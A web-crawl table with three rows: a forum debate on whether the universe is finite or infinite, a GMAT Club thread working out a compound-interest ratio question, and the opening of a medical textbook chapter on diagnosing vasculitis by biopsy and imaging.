| url (string, 14–2.42k chars) | text (string, 100–1.02M chars) | date (string, 19 chars) | metadata (string, 1.06k–1.1k chars) |
|---|---|---|---|
http://www.sciforums.com/threads/big-bang-theory-is-bang-wrong.4544/page-4
|
# Big Bang Theory Is Bang Wrong
Discussion in 'Astronomy, Exobiology, & Cosmology' started by amraam, Nov 12, 2001.
1. ### Canute (Registered Senior Member)
Messages:
1,923
I do not disagree, by your definition of the terms.
3. ### Beercules (Registered Senior Member)
Messages:
342
A singularity has zero volume, and an infinite universe has infinite volume.
Keep in mind that the universe may also be finite.
5. ### The Philosopher (Registered Member)
Messages:
12
The Universe has been shown to have an accelerating expansion thus defying the critical density and making it infinite.
The difference between calling the Universe a singularity or infinite is that a singularity is a single point, the Universe, from our dimensional viewpoint is a large spread/expanse.
But who is to say that a singularity does not, in some higher dimension, say the 11th dimension, have greater volume than the Universe? That is where this all gets complicated, under string, superstring and M-theory.
M.
7. ### James R, Just this guy, you know? (Staff Member)
Messages:
30,835
Philosopher:
<i>The Universe has been shown to have an accelerating expansion thus defying the critical density and making it infinite.</i>
An accelerating universe does not have to be infinite. In fact, most astronomers think our universe is finite. The density of matter is thought to be greater than the critical density, but there's also "dark energy".
8. ### Canute (Registered Senior Member)
Messages:
1,923
Yes but there is another way of looking at it. If the universe is infinite then it is all that there is with 'nothing' outside of it, if it is a singularity then likewise it is all there is with 'nothing' outside of it. From inside the universe the two conditions are indistinguishable.
The universe may be finite but in that case it exists in the cosmos, which is not. I think this is just a choice of definition.
9. ### Beercules (Registered Senior Member)
Messages:
342
They are quite distinguishable, because you're not likely to find anyone alive in a point of infinite temperature. Mathematically, there is a difference between zero and infinite volume, though we can't imagine either.
I don't know what you mean by cosmos. Are you implying there is some kind of multiverse outside our expanding universe, or do you just mean space-time as a whole?
10. ### The Philosopher (Registered Member)
Messages:
12
Hmmm... "dark energy" is very much a flawed concept in astronomical terms; it relies heavily on highly theoretical hypotheses, whereas astronomy is mainly observational. Because the Universe has an accelerating expansion it will never experience a Big Crunch to "close" the Universe; it will remain in an "open" state and just expand forever, thus making it infinite. The major point missing here is a definition of infinite. At the moment, the Universe is, in fact, infinite because we cannot define its edges: as soon as you do define those edges, they will have moved outwards. It is just like a road map: each time a new road map is commissioned, it becomes instantly out of date due to new building of roads, etc. Also, defining the Universe becomes subject to the Heisenberg Uncertainty Principle.
M.
11. ### Canute (Registered Senior Member)
Messages:
1,923
If the universe is all there is then it seems unreasonable to say that once it had zero volume and now it is infinite. Where did all that volume come from? Surely the universe is no more or less than it ever was (a closed system, in other words). High temperatures damage human beings, but let's not be anthropomorphic. Can you clarify what we should both mean when we say 'singularity'? Is it a non-point or a very small one? I ask because this may be what we disagree about.
I was trying to avoid a misunderstanding caused by our definition of universe. Some people mean this universe, one among many in a multiverse, and some people mean everything that there is.
12. ### Beercules (Registered Senior Member)
Messages:
342
Well, you're running into the absurdity of a singularity. In the case of an infinite universe, the overall size is constant. Space is infinite now, and always will be. At t=0 this universe vanishes, but that is only because there is no quantum theory of gravity. The infinities of GR should be replaced by something finite, which should mean the infinite universe remains infinite even at the very beginning.
We're talking about infinite temperature here - where even atoms cannot form. But again, this is one of the absurdities of a singular universe. You have infinite temperature in a point of zero volume.
Ok, but "all that there is" could still be finite.
13. ### Canute (Registered Senior Member)
Messages:
1,923
Agree with the rest of your post but not this. Is there a fence around it or what?
14. ### Beercules (Registered Senior Member)
Messages:
342
There is nothing logically inconsistent about a finite universe. The concept of infinite space is just more in line with what we're used to thinking.
15. ### Canute (Registered Senior Member)
Messages:
1,923
Are you sure? It seems to me that there is.
16. ### Beercules (Registered Senior Member)
Messages:
342
Like what?
17. ### Canute (Registered Senior Member)
Messages:
1,923
Well, it might be my lack of imagination, but I cannot conceive of there being an end to the cosmos. Why would it end? What would be 'outside' of it? What law of nature would determine that there were limits to its existence? How would we know if we reached the edge? How could it be both eternal and finite?
Also I have a problem with the idea that infinities can exist within a finite cosmos.
18. ### Beercules (Registered Senior Member)
Messages:
342
I also find it hard to imagine anything like that, but that isn't a logical inconsistency. It is only a flaw of our limited human intuition.
If the universe is finite, there is no outside. It can be a hypersphere or have a hyperbolic shape, which means there would be no edge or center. I'm sure you've heard of the balloon analogy, and that applies here. The curved 2D surface represents the universe, with no inside or outside space. A 2D person could go in a straight line and, if he went far enough, he would wind up right back where he started. The problem is that this is only a 2D analogy, and we cannot possibly imagine what a curved 3D surface looks like. But we can mathematically define it, and this is the picture cosmology paints for our universe.
But it does seem hard to believe that space could be finite. When we consider that infinity is the only alternative, it seems somewhat easier to believe.
19. ### Canute (Registered Senior Member)
Messages:
1,923
I agree generally with what you said but still wonder what it means, what it tells us, that we cannot conceive of a cosmos that is finite without invoking all sorts of intellectual complications. Also Mr. Occam's razor suggests that the pragmatic and sensible hypothesis is that it is infinite.
I disagree with the bit of your post I have quoted. By some quirk of my neurons I find it easier to believe in infinity.
20. ### James R, Just this guy, you know? (Staff Member)
Messages:
30,835
The Philosopher:
<i>Hmmm..."dark energy" is very much a flawed concept in astronomical terms, it relies very much on highly theoretical hypotheses, whereas astronomy is observational mainly.</i>
Astronomy is observation. Astrophysics is very much theoretical.
What is flawed about dark energy, in particular?
<i>Because the Universe has an accelerating expansion it will never experience a Big Crunch to "close" the Universe, but it will remain in an "open" state and just expand forever, thus making it infinite.</i>
The terms "closed" and "open" have very specific meanings in cosmology. As I said before, most astronomers currently believe the universe is closed, despite the fact that the expansion seems to be accelerating. Whether the universe is closed or open depends only on the total mass density.
21. ### Beercules (Registered Senior Member)
Messages:
342
Well, when you accept that curved space is gravity, the notion of closed finite universes does not seem that complicated.
But I agree that an infinite universe is easier to grasp at first thought. That is, until you start to look at the concept in more detail. Infinite space. Infinite galaxies. Infinite earths. Infinite people identical to yourself. No wonder such a concept has driven people mad. It's too bad there are only 2 options - as both an infinite and finite space seem difficult to swallow.
22. ### blobrana (Registered Senior Member)
Messages:
2,214
Infinite space, yes (although bounded, as in foamy space).
Infinite galaxies and planets etc., no.
There was only so much matter made during the big bang.
If you look at the baryon density and photon density there is a ratio of one billion to one.
This gives an upper mass limit to the production of baryonic matter in the universe (let's say 10^80 baryons), so there can only be a limited number (although astronomical).
The recent findings of the MAP probe have shown that there is not enough mass in the universe to close it, therefore it is open.
There are other lines of research that show that the value of omega (I won't explain) is within 10^60 decimal places of being flat!
For all intents and purposes I would imagine that the universe IS flat (with not one electron more or less), so that the universe will expand forever....
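The 10^80 figure above is easy to sanity-check with a rough order-of-magnitude estimate. The short Python sketch below is illustrative only; all input values are assumed round numbers, not taken from the post:

```python
# Rough order-of-magnitude check of the "~10^80 baryons" figure quoted above.
# Assumed round numbers: critical density ~9e-27 kg/m^3, baryon fraction ~5%,
# observable-universe radius ~4.4e26 m, proton mass ~1.67e-27 kg.
import math

rho_crit = 9e-27        # kg/m^3, approximate critical density
omega_b = 0.05          # approximate baryon fraction of the total density
R = 4.4e26              # m, approximate radius of the observable universe
m_p = 1.67e-27          # kg, proton mass

volume = (4.0 / 3.0) * math.pi * R**3          # volume of the observable universe
n_baryons = rho_crit * omega_b * volume / m_p  # estimated total baryon count

print(f"~10^{math.log10(n_baryons):.0f} baryons")  # prints roughly 10^80
```

With these inputs the estimate lands near 10^80, consistent with the number quoted.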
23. ### Beercules (Registered Senior Member)
Messages:
342
An infinite universe has an infinite amount of energy, hence an infinite number of galaxies.
|
2018-02-23 20:42:38
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5700027942657471, "perplexity": 825.2843234864333}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891814833.62/warc/CC-MAIN-20180223194145-20180223214145-00434.warc.gz"}
|
http://gmatclub.com/forum/a-bank-offers-an-interest-of-5-per-annum-compounded-annua-154203.html?fl=similar
|
# A bank offers an interest of 5% per annum compounded annua
Manager
Joined: 09 Feb 2013
Posts: 120
Followers: 1
Kudos [?]: 764 [4] , given: 17
A bank offers an interest of 5% per annum compounded annua [#permalink]
11 Jun 2013, 03:58
Difficulty:
35% (medium)
Question Stats:
74% (02:36) correct 26% (02:10) wrong based on 316 sessions
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225

Last edited by Bunuel on 28 Jan 2015, 07:43, edited 2 times in total. Edited the question.

Math Expert
Joined: 02 Sep 2009
Posts: 35337
Followers: 6651
Kudos [?]: 85954 [12] , given: 10265

Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
11 Jun 2013, 05:59

emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225
The interest earned in the 1st year = $500
The interest earned in the 2nd year = $500*1.05
The interest earned in the 3rd year = $500*1.05^2
The interest earned in the 4th year = $500*1.05^3
The interest earned in the 5th year = $500*1.05^4
(500*1.05^3)/(500*1.05^4) = 1/1.05 = 100/105.
Answer: C.

Manager
Status: Working hard to score better on GMAT
Joined: 02 Oct 2012
Posts: 90
Location: Nepal
Concentration: Finance, Entrepreneurship
GPA: 3.83
WE: Accounting (Consulting)
Followers: 0
Kudos [?]: 141 [0], given: 23

Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
14 Jun 2013, 03:22

emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225
Hi Bunuel,
Here is my approach: is this correct?
Interest earned in 4 years = 10000(1+0.05)^4
Interest earned in 5 years = 10000(1+0.05)^5
Ratio = {10000(1.05)^4}/{10000(1.05)^5} => 1.05^4/1.05^5 => 1/1.05. Multiplying by 100 in both numerator and denominator gives 100:105
Hence Ans:C
Math Expert
Joined: 02 Sep 2009
Posts: 35337
Followers: 6651
Kudos [?]: 85954 [0], given: 10265
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
14 Jun 2013, 03:28
atalpanditgmat wrote:
emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225

Hi Bunuel,
Here is my approach: is this correct?
Interest earned in 4 years = 10000(1+0.05)^4
Interest earned in 5 years = 10000(1+0.05)^5
Ratio = {10000(1.05)^4}/{10000(1.05)^5} => 1.05^4/1.05^5 => 1/1.05. Multiplying by 100 in both numerator and denominator gives 100:105
Hence Ans: C

Check here: a-bank-offers-an-interest-of-5-per-annum-compounded-annua-154203.html#p1234708

Manager
Joined: 29 Sep 2013
Posts: 53
Followers: 0
Kudos [?]: 30 [3] , given: 48

Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
26 Oct 2013, 02:14

emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225
Thirty-second approach: regardless of what the figure is at the 4th year, it will act as a base figure (100) for the next year's 5% increase (to 105). So the ratio is 100:105, or option C.
Manager
Status: Do till 740 :)
Joined: 13 Jun 2011
Posts: 113
Concentration: Strategy, General Management
GMAT 1: 460 Q35 V20
GPA: 3.6
WE: Consulting (Computer Software)
Followers: 1
Kudos [?]: 8 [0], given: 19
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
15 Apr 2014, 20:39
Bunuel,
I have a doubt.
Quote:
The interest earned in the 1st year = $50
The interest earned in the 2nd year = $50*1.05
The interest earned in the 3rd year = $50*1.05^2
The interest earned in the 4th year = $50*1.05^3
The interest earned in the 5th year = $50*1.05^4

So we are just calculating the interest from interest. Are we not supposed to calculate the interest from the principal amount every year?

SVP
Status: The Best Or Nothing
Joined: 27 Dec 2012
Posts: 1858
Location: India
Concentration: General Management, Technology
WE: Information Technology (Computer Software)
Followers: 40
Kudos [?]: 1756 [0], given: 193

Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
15 Apr 2014, 22:00

atalpanditgmat wrote:
emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225
Hi Bunuel,
Here is my approach: is this correct?
Interest earned in 4 years = 10000(1+0.05)^4
Interest earned in 5 years = 10000(1+0.05)^5
Ratio = {10000(1.05)^4}/{10000(1.05)^5} => 1.05^4/1.05^5 => 1/1.05. Multiplying by 100 in both numerator and denominator gives 100:105
Hence Ans:C
This formula calculates the total amount, not the compound interest.
You need to subtract the principal to get the resulting compound interest.
We need to calculate the ratio of the interest earned in the 4th year to that earned in the 5th year.
The method you're using calculates the ratio of the 4-year deposit value to the 5-year deposit value.
SVP
Status: The Best Or Nothing
Joined: 27 Dec 2012
Posts: 1858
Location: India
Concentration: General Management, Technology
WE: Information Technology (Computer Software)
Followers: 40
Kudos [?]: 1756 [0], given: 193
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
15 Apr 2014, 22:06
Bunuel wrote:
emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225

The interest earned in the 1st year = $50
The interest earned in the 2nd year = $50*1.05
The interest earned in the 3rd year = $50*1.05^2
The interest earned in the 4th year = $50*1.05^3
The interest earned in the 5th year = $50*1.05^4
(50*1.05^3)/(50*1.05^4) = 1/1.05 = 100/105.
Bunuel, can you please correct this?
It should be 500
$$\frac{10000 * 5 * 1}{100} = 500$$
Intern
Joined: 20 May 2014
Posts: 39
Followers: 0
Kudos [?]: 3 [0], given: 1
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
23 Jul 2014, 09:42
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
a) 1:5
b) 625 : 3125
c) 100 : 105
d) 100^4 : 105^4
e) 725 : 3225

First year: 10,000 + 5% of 10,000.
NOTE: Using fractions is typically the easiest way to calculate, so we'll represent 5% as 1/20 from here on out.
Second year: 10,000*(21/20) + (1/20)*(10,000*(21/20)) = (21/20)*(10,000*(21/20)) = (21/20)^2*10,000
Third year: (21/20)^2*(10,000) + (1/20)*(21/20)^2*(10,000) = (21/20)*(21/20)^2*(10,000) = (21/20)^3*(10,000)
If you follow the pattern, the total value at the end of the nth year will simply be (21/20)^n*(10,000). The amount of interest each year is 1/20 of the previous year's balance (that "...+1/20 * the previous year"). So, the amount of interest calculated in the 4th year will be:
(1/20)*(21/20)^3*(10,000)
And the amount of interest earned in the 5th year will be:
(1/20)*(21/20)^4*(10,000)
Putting those into a ratio, you'll see that the 1/20 and the 10,000 are common to both, so those terms divide out, leaving simply:
(21/20)^3/(21/20)^4
Factoring out the common (21/20)^3 term, we're left with 1/(21/20). Dividing by a fraction is the same as multiplying by the reciprocal, so that can be expressed as 20/21, which is the same as 100/105.

MY CONFUSION: IT WAS A LONG WORDY EXPLANATION AND I GOT LOST IN IT, SO I NEED A MORE CONCISE EXPLANATION IF POSSIBLE. ALSO, WHERE DOES THE 21/20 COME FROM? IN THE SECOND YEAR, HOW COME WE ARE ADDING 21/20 AND 1/20 AND THEN MULTIPLYING BY 10,000 AND 1/20, WHY NOT MULTIPLY BY 21/20?

Math Expert
Joined: 02 Sep 2009
Posts: 35337
Followers: 6651
Kudos [?]: 85954 [0], given: 10265

Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
23 Jul 2014, 09:47

sagnik2422 wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
a) 1:5
b) 625 : 3125
c) 100 : 105
d) 100^4 : 105^4
e) 725 : 3225
First year: 10,000 + 5% of 10,000.
NOTE: Using fractions is typically the easiest way to calculate, so we’ll represent 5% as 1/20 from here on out.
Second year: 10,000*(21/20) + (1/20)*(10,000*(21/20)) = (21/20)*(10,000*(21/20)) = (21/20)^2*10,000
Third year: (21/20)^2*(10,000) + (1/20)*(21/20)^2*(10,000) = (21/20)*(21/20)^2*(10,000) = (21/20)^3*(10,000)
If you follow the pattern, the total value at the end of each year will simply be (21/20)^n*(10,000) at the end of the nth year. The amount of interest each year is 1/20 of the previous year's balance (that "...+1/20 * the previous year"). So, the amount of interest calculated in the 4th year will be:
(1/20)*(21/20)^3*(10,000)
And the amount of interest earned in the 5th year will be:
(1/20)*(21/20)^4*(10,000)
Putting those into a ratio, you'll see that the 1/20 and the 10,000 are common to both, so those terms divide out, leaving simply:
(21/20)^3/(21/20)^4
Factoring out the common (21/20)^3 term, we're left with 1/(21/20). Dividing by a fraction is the same as multiplying by the reciprocal, so that can be expressed as 20/21, which is the same as 100/105.
MY CONFUSION: IT WAS A LONG WORDY EXPLANATION AND I GOT LOST IN IT, SO I NEED A MORE CONCISE EXPLANATION IF POSSIBLE. ALSO, WHERE DOES THE 21/20 COME FROM? IN THE SECOND YEAR, HOW COME WE ARE ADDING 21/20 AND 1/20 AND THEN MULTIPLYING BY 10,000 AND 1/20, WHY NOT MULTIPLY BY 21/20?
Merging topics. Please refer to the discussion above.
Intern
Joined: 17 Aug 2014
Posts: 5
Followers: 0
Kudos [?]: 0 [0], given: 13
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
03 Sep 2014, 12:11
Hi Bunuel, I like your explanation but have 2 questions.
You say (500*1.05^3)/(500*1.05^4) = 1/1.05. I understand the 1, but when you divide exponents, I thought you subtract (i.e. 1.05^3/1.05^4 = 1.05^-1).
Also, what would the equation look like if they wanted the ratio of the total amounts (principal + interest) for years 4 and 5?
Director
Joined: 23 Jan 2013
Posts: 547
Schools: Cambridge'16
Followers: 1
Kudos [?]: 39 [0], given: 40
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
03 Sep 2014, 21:59
10000*1.05^4/10000*1.05^5
we get 10000/10000*1.05=10000/10500=100/105
Verbal Forum Moderator
Joined: 16 Jun 2012
Posts: 1153
Location: United States
Followers: 248
Kudos [?]: 2701 [0], given: 123
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
03 Sep 2014, 23:12
Temurkhon wrote:
10000*1.05^4/10000*1.05^5
we get 10000/10000*1.05=10000/10500=100/105
Hello.
You're correct for choosing C but wrong on the interest formula, buddy.
The question asks you to calculate the ratio of the interest earned in the 4th year to the interest earned in the 5th year. Your formula calculates the total value in the 4th year and 5th year, NOT the interests.
In order to calculate INTEREST in 4th and 5th year, you have to calculate INTEREST in 1st year.
interest in 1st year = 10,000*0.05 = 500
interest in 2nd year = 500*1.05
interest in 3rd year = 500*1.05^2
interest in 4th year = 500*1.05^3
interest in 5th year = 500*1.05^4
Ratio = 1/1.05 = 100/105
Hope it helps.
Intern
Joined: 16 Mar 2014
Posts: 4
Followers: 0
Kudos [?]: 0 [0], given: 0
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
07 Jul 2015, 11:40
Could somebody please explain how the interest can be calculated this way:
The interest earned in the 1st year = $500
The interest earned in the 2nd year = $500*1.05
The interest earned in the 3rd year = $500*1.05^2
The interest earned in the 4th year = $500*1.05^3
The interest earned in the 5th year = $500*1.05^4

Since we are compounding, the interest for the second year should be 500 + 500*1.05.

VP
Joined: 08 Jul 2010
Posts: 1344
Location: India
GMAT: INSIGHT
WE: Education (Education)
Followers: 57
Kudos [?]: 1262 [0], given: 42

Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
07 Jul 2015, 14:20

emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225
Interest earned in the first year = $10,000 *(5/100) =$500
i.e. the interest earned in the 1st year = $500
The interest earned in the second year = $10,000*(5/100) + $500*(5/100) = $500 + (5/100)*$500 = $500*1.05
i.e. the interest earned in the 2nd year = $500*1.05
Similarly,
The interest earned in the 3rd year = $500*1.05^2
The interest earned in the 4th year = $500*1.05^3
The interest earned in the 5th year = $500*1.05^4
(500*1.05^3)/(500*1.05^4) = 1/1.05 = 100/105.
NOTE: Writing every step here is not a great idea; we must understand that compound interest is a form of geometric progression in which the ratio of two consecutive terms remains constant, hence
1st year interest / 2nd year interest = 2nd year interest / 3rd year interest = 3rd year interest / 4th year interest = 4th year interest / 5th year interest = 1/1.05
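The geometric progression is easy to check numerically; here is a short Python sketch (illustrative only, not part of the original post):

```python
# Verify that the yearly interest amounts form a geometric progression with
# common ratio 1.05, so 4th-year interest : 5th-year interest = 100 : 105.
principal, rate = 10_000.0, 0.05

balances = [principal * (1 + rate) ** n for n in range(6)]    # balance after year n
interest = [balances[n + 1] - balances[n] for n in range(5)]  # interest earned during year n+1

for year, amount in enumerate(interest, start=1):
    print(f"year {year}: interest = {amount:9.4f}")           # 500, 525, 551.25, ...

print(interest[3] / interest[4], 100 / 105)                   # both 0.952380...
```

Each year's interest is just the previous year's interest times 1.05, which is exactly the constant-ratio property the note describes.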
Intern
Joined: 16 Aug 2013
Posts: 18
Followers: 0
Kudos [?]: 1 [0], given: 60
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
17 Sep 2015, 21:26
shankar245 wrote:
Bunuel,
I have a doubt.
Quote:
The interest earned in the 1st year = $50
The interest earned in the 2nd year = $50*1.05
The interest earned in the 3rd year = $50*1.05^2
The interest earned in the 4th year = $50*1.05^3
The interest earned in the 5th year = $50*1.05^4

So we are just calculating the interest from interest. Are we not supposed to calculate the interest from the principal amount every year?

Hi Bunuel,
I agree with shankar245.
The interest earned in the 4th year is 10000(1+0.05)^4-10000 = 10000((1+0.05)^4-1)
The interest earned in the 5th year is 10000(1+0.05)^5-10000 = 10000((1+0.05)^5-1)
The ratio is ((1+0.05)^4-1)/((1+0.05)^5-1) = 0.78
Can you please clarify?

VP
Joined: 08 Jul 2010
Posts: 1344
Location: India
GMAT: INSIGHT
WE: Education (Education)
Followers: 57
Kudos [?]: 1262 [0], given: 42

A bank offers an interest of 5% per annum compounded annua [#permalink]
17 Sep 2015, 23:47

amirzohrevand wrote:
shankar245 wrote:
Bunuel,
I have a doubt.
Quote:
The interest earned in the 1st year = $50
The interest earned in the 2nd year = $50*1.05
The interest earned in the 3rd year = $50*1.05^2
The interest earned in the 4th year = $50*1.05^3
The interest earned in the 5th year = $50*1.05^4
So we are just calculating the interest from interest. Are we not supposed to calculate the interest from the principal amount every year?
Hi Bunuel
I agree with shankar245.
The interest earned in the 4th year is 10000(1+0.05)^4-10000 = 10000((1+0.05)^4-1)
The interest earned in the 5th year is 10000(1+0.05)^5-10000 = 10000((1+0.05)^5-1)
The ratio is ((1+0.05)^4-1)/((1+0.05)^5-1) = 0.78
$500*1.05 = $500 + (5/100)*$500
where $500 is interest earned on the principal, and (5/100)*$500 is interest earned on the previous interest. So the expressions include both.
I hope this helps!

Last edited by GMATinsight on 18 Sep 2015, 04:06, edited 1 time in total.

Intern
Joined: 16 Aug 2013
Posts: 18
Followers: 0
Kudos [?]: 1 [0], given: 60

A bank offers an interest of 5% per annum compounded annua [#permalink]
18 Sep 2015, 01:06

Hi Bunuel,
I agree with shankar245.
The interest earned in the 4th year is 10000(1+0.05)^4-10000 = 10000((1+0.05)^4-1)
The interest earned in the 5th year is 10000(1+0.05)^5-10000 = 10000((1+0.05)^5-1)
The ratio is ((1+0.05)^4-1)/((1+0.05)^5-1) = 0.78
Can you please clarify?

$50*1.05 = 50 + (5/100)*50
where 50 is interest earned on the principal
and
(5/100)*50 is interest earned on the previous interest.
So the expressions include both.
I hope this helps!
Hi,
Dear GMATinsight,
I don't agree with your approach because you dismissed the principal; the principal must be accounted for.
Your approach yields 0.92 but my approach yields 0.78.
I'm still confused.
Could you elaborate more, please?
Can you please let me know what is wrong with my approach?
Thanks
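The two numbers in this exchange can be checked directly. The short Python sketch below (illustrative only, not from the thread) contrasts the two quantities being computed: the interest earned during a single year versus the interest accumulated since the deposit.

```python
# Interest earned DURING year n vs. interest ACCUMULATED through n years.
principal, rate = 10_000.0, 0.05

def balance(n):
    """Balance after n full years of annual compounding."""
    return principal * (1 + rate) ** n

during_4th = balance(4) - balance(3)    # 500*1.05^3: interest of the 4th year alone
during_5th = balance(5) - balance(4)    # 500*1.05^4: interest of the 5th year alone
cumulative_4 = balance(4) - principal   # 10000((1.05)^4 - 1): total interest in 4 years
cumulative_5 = balance(5) - principal   # 10000((1.05)^5 - 1): total interest in 5 years

print(during_4th / during_5th)          # 0.95238... = 100/105 (what the question asks)
print(cumulative_4 / cumulative_5)      # 0.78...: a different quantity
```

Both computations are internally consistent; they simply answer different questions, and the GMAT problem asks for the ratio of the interest earned in each single year.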
VP
Joined: 08 Jul 2010
Posts: 1344
Location: India
GMAT: INSIGHT
WE: Education (Education)
Followers: 57
Kudos [?]: 1262 [0], given: 42
Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
18 Sep 2015, 04:04
amirzohrevand wrote:
Hi,
Dear GMATinsight,
I don't agree with your approach because you dismissed the principal; the principal must be accounted for.
Your approach yields 0.92 but my approach yields 0.78.
I'm still confused.
Could you elaborate more, please?
Can you please let me know what is wrong with my approach?
Thanks
Principal = $10,000
Rate of interest = 5%
Interest earned in the first year = $10,000*(5/100) = $500
i.e. the interest earned in the 1st year = $500
The interest earned in the second year = $10,000*(5/100) + $500*(5/100) = $500 + (5/100)*$500 = $500*1.05
i.e. the interest earned in the 2nd year = $500*1.05
Similarly,
The interest earned in the 3rd year = $500*1.05^2
The interest earned in the 4th year = $500*1.05^3
The interest earned in the 5th year = $500*1.05^4
(500*1.05^3)/(500*1.05^4) = 1/1.05 = 100/105.

Current Student
Joined: 04 May 2015
Posts: 75
Concentration: Strategy, Operations
WE: Operations (Military & Defense)
Followers: 1
Kudos [?]: 15 [0], given: 58

Re: A bank offers an interest of 5% per annum compounded annua [#permalink]
28 Sep 2015, 08:42

suk1234 wrote:
emmak wrote:
A bank offers an interest of 5% per annum compounded annually on all its deposits. If $10,000 is deposited, what will be the ratio of the interest earned in the 4th year to the interest earned in the 5th year?
A. 1:5
B. 625:3125
C. 100:105
D. 100^4:105^4
E. 725:3225
Thirty-second approach: regardless of what the figure is at the 4th year, it will act as a base figure (100) for the next year's 5% increase (to 105). So the ratio is 100:105, or option C.
I am literally ashamed that I didn't see this
|
2016-10-28 20:20:18
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4335744380950928, "perplexity": 3678.363675421448}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988725470.56/warc/CC-MAIN-20161020183845-00183-ip-10-171-6-4.ec2.internal.warc.gz"}
|
http://accessmedicine.mhmedical.com/content.aspx?bookid=331§ionid=40727128
|
Chapter e40
Diagnosis of the vasculitic syndromes is usually based upon characteristic histologic or arteriographic findings in a patient who has clinically compatible features. The images provided in this atlas highlight some of the characteristic histologic and radiographic findings that may be seen in the vasculitic diseases. These images demonstrate the importance that tissue histology may have in securing the diagnosis of vasculitis, the utility of diagnostic imaging in the vasculitic diseases, and the improvements in the care of vasculitis patients that have resulted from radiologic innovations.
Tissue biopsies provide vital information in many patients with a suspected vasculitic syndrome, not only in confirming the presence of vasculitis and other characteristic histologic features, but also in ruling out other diseases that can have similar clinical presentations. The determination of where biopsies should be performed is based upon the presence of clinical disease in an affected organ, the likelihood of a positive diagnostic yield from data contained in the published literature, and the risk of performing a biopsy at an affected site. Common sites where biopsies may be performed include the lung, kidney, and skin. Other sites such as sural nerve, brain, testicle, and gastrointestinal tissues may also demonstrate features of vasculitis and be appropriate locations for biopsy when clinically affected.
